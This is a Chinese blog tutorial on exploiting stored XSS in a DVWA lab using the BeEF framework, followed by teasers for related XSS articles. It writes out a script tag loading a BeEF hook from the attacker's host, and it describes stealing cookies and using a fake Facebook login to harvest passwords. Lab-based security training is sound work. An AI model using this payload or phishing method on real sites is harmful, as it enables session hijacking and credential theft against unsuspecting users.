xss实战

最新推荐文章于 2024-08-17 23:05:13 发布
最新推荐文章于 2024-08-17 23:05:13 发布
阅读量859 收藏 5
点赞数 2
分类专栏: 漏洞利用 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/114417912
版权

xss实战(利用beef渗透框架)

beef介绍

BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具

实验环境

kalilinux(192.168.8.133)
win10专业版(10.61.248.249)
win7旗舰版(192.168.8.137)
OWASP Broken Web Apps VM v1.2(192.168.8.135)

利用xss漏洞

打开kalilinux,在终端输入beef-xss打开beef工具


我们使用win10作为攻击机进入到OWASP Broken Web Apps VM v1.2的dvwa的XSS stored模块
在message的位置输入<script src="http://192.168.8.133:3000/hook.js"></script>

利用beef对xss进行利用

我们进入到beef的网站,win10下输入192.168.8.133:3000/ui/panel,默认账号为beef,默认密码为beef

这时win7模拟客户进入了192.168.8.135,不小心点到了xss stored的网页,beef左上角就会有win7电脑的显示,中间会显示win7客户的cookie信息等等

下面就是所有可以用的利用模块

这里不一一演示,演示一个社会工程学的案例

在客户端xin7查看,发现多了一个facebook的登入页面,客户以为是网站需要输入了自己的账号密码

这时你的账号密码就已经被攻击者拿到了

里面还有非常多的攻击方式,可以自己动手都试试

【网络安全】XSS盲打实战案例:某网页漫画
HBohan的博客
01-18 2447
"XSS盲打"是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的XSS攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发XSS来实现攻击者预定好的“真实攻击功能”。
xss实战xss靶场通关详解
maluxiao123的博客
04-02 2088
第一关:我们发现页面上没有任何可以输入的地方 但是发现url中有参数传递为test,而页面上也显示了test,所以说,传入的参数可以显示到页面上。 使用f12控制台查看原代码 我们传入<script></script> 这里可以发现,原本来的test不见了,按理来说应该会出现欢迎用户<script></script>才对,但是没有,到哪里去了,没错,他被浏览器解析了,在这个标签中就可以插入你想执行的js代码 我们由于靶场需要弹窗才能进入下一关,所以传入&
XSS攻防实战(附JS源码)
我本可以容忍阳光,如果我不曾见过太阳,然而阳光已使我荒凉,成为更新的荒凉。
09-07 1065
授权转载自:乔珂力https://juejin.im/post/6867184627393265677之前写过两篇文章分别介绍了 Cookie :https://juejin.im/p...
XSS漏洞洞讲解
Wincreds的博客
08-17 1888
XSS跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的网络安全漏洞,它允许攻击者在其他用户访问的网页中注入恶意脚本。XSS 攻击的主要目标是通过在受害者的浏览器中执行恶意代码来窃取敏感信息、篡改网页内容或劫持用户会话。
XSS攻击实战
qq_44915227的博客
04-18 2631
XSS攻击全程跨站脚本攻击。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。与SQL注入类似,XSS也是利用提交恶意信息来实现攻击,但是XSS一般提交的是JavaScript脚本,运行在Web端,就是用户的浏览器。SQL注入提交的SQL命令在后台的数据库服务器执行。
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战
m0_67844671的博客
10-05 4804
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS项目实战
最新发布
qq_68389880的博客
08-17 944
innerText函数会将'<','>'进行实体编码转义;ok传入了,但是后面的函数值被删掉了,这是因为javascript对于DOMPurify框架来说是黑名单,我们需要找到这个框架对应的白名单;过滤了'(' ')' '`' '\';过滤了alert函数,可以选择切换为confirm函数,但是意义不大;这道题过滤了'<''>';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1722
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储型XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
XSS攻防实战
troy
09-10 755
XSS 的全称叫跨站脚本攻击(Cross Site Scripting),攻击出现的原因一般是因为 Web 程序对用户的输入过滤不足导致的一种漏洞,攻击者可以把恶意的脚本代码注入到网页之中,当其他用户浏览时就会执行其中的恶意代码,对受害者产生各种攻击。XSS 一般分为三种类型: 反射型 存储型 DOM型 反射型 XSS 攻防实战 反射型 XSS 攻击的恶意脚本并没有被存储到后端数据库中,而是诱导用户点击某个精心拼接的恶意链接,从而达到攻击的目的。 攻击案例 一个常见的场景是用户在某电影网站搜索,假如
XSS漏洞xss_and_mysql_file靶场实战)——渗透day10
qq_62716256的博客
09-07 2139
XSS漏洞xss_and_mysql_file靶场实战)——day10
实战 | 记某个有趣的xss挖掘之旅
Sp4rkW的博客
03-23 1486
最近某次挖洞的过程中遇到一个非常有意思的xss,记录一下与大家分享,全文已脱敏 目录速览存在xss的可疑点走出去走回来 存在xss的可疑点 测试时某被动扫描器打到了一个疑似xss的点 随手掏万能验证payloadconsole.log(111),但是.被转换成了_,空格也被转换成了_ 空格通过注释/**/解决问题,但最大的问题还是在于.被拦截了 各种编码尝试一波,无果,开始尝试诸如alert,...
XSS高级实战教程
09-28
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
xss实战-------要点记录
bylfsj的博客
09-13 942
1.htmlentities() 只对html标签做字符转化,对html里的英文字母不做转换,但是对汉字会做转换!------------乱码区别 2.htmlspecialchars() ‘单引号考虑未转义
WEB安全实战(二)带你认识 XSS 攻击
紫羽风的博客
10-30 5998
前言 上一篇文章写了关于 WEB 安全方面的实战,主要是解决 SQL 盲注的安全漏洞。这篇文章本来是要写一篇关于如何防治 XSS 攻击的,但是想来想去,还是决定先从理论上认识一下 XSS 吧。下一篇文章,再深入研究如何防治的问题。 概念 到底什么是 XSS 攻击呢?XSS 攻击,全称是“跨站点脚本攻击”(Cross Site Scripting),之所以缩写为
XSS 实战攻击思路总结,看过的人都收藏了
hackzkaq的博客
11-13 1890
作者:先知社区-国光 原文:https://xz.aliyun.com/t/8459 前言 前几天看到 B 站某up 主投稿的视频「QQ被盗后发布赌博广告,我一气之下黑了他们网站」,看完后不禁感叹为啥自己没有那么好的运气...... 实际上这就是一个中规中矩的 XSS 漏洞案例,在安全圈子里面应该也算是基本操作,正好博客以前没有记录过类似的文章,那么本文就来还原一下这个攻击过程。 鉴别网站 下面是一个经典的 QQ 空间钓鱼网站: 域名分析 钓鱼网...
XSS通关实战
m0_55563900的博客
03-10 362
XSS基础 跨站脚本(Cross -Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后,可能层到很高的权限(如执行一些操作)、 私密网页内容、 会话和cookie等各种内容。 XSS攻击可以分为三种:反射型、存储型和DOM型。 反射型 反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。、 攻击方式:攻击者通过电子邮件等方式将包
xss靶场实战(xss-labs-master靶场)
liushaojiax的博客
02-25 1226
,使用链接标签中的javascript:伪协议来执行 JS 代码,点击插入的链接便会弹窗。修改 url 地址中的name=<script>alert(1)
XSS实战漏洞挖掘
hmysn的博客
05-11 1019
接下来一年时间将会主要研究渗透测试方向的众多问题,文章中的内容也会在后面定期更新。本文主要记录了一些XSS漏洞挖掘中的实用心得和学习笔记。
XSS高级实战:从基础到深度利用
"XSS高级实战教程" XSS(Cross Site Scripting)是一种常见的网络安全漏洞,攻击者通过在网页上注入恶意脚本,使得用户在访问这些页面时执行这些脚本,从而达到攻击目的。XSS攻击的核心是利用了网站对用户输入数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值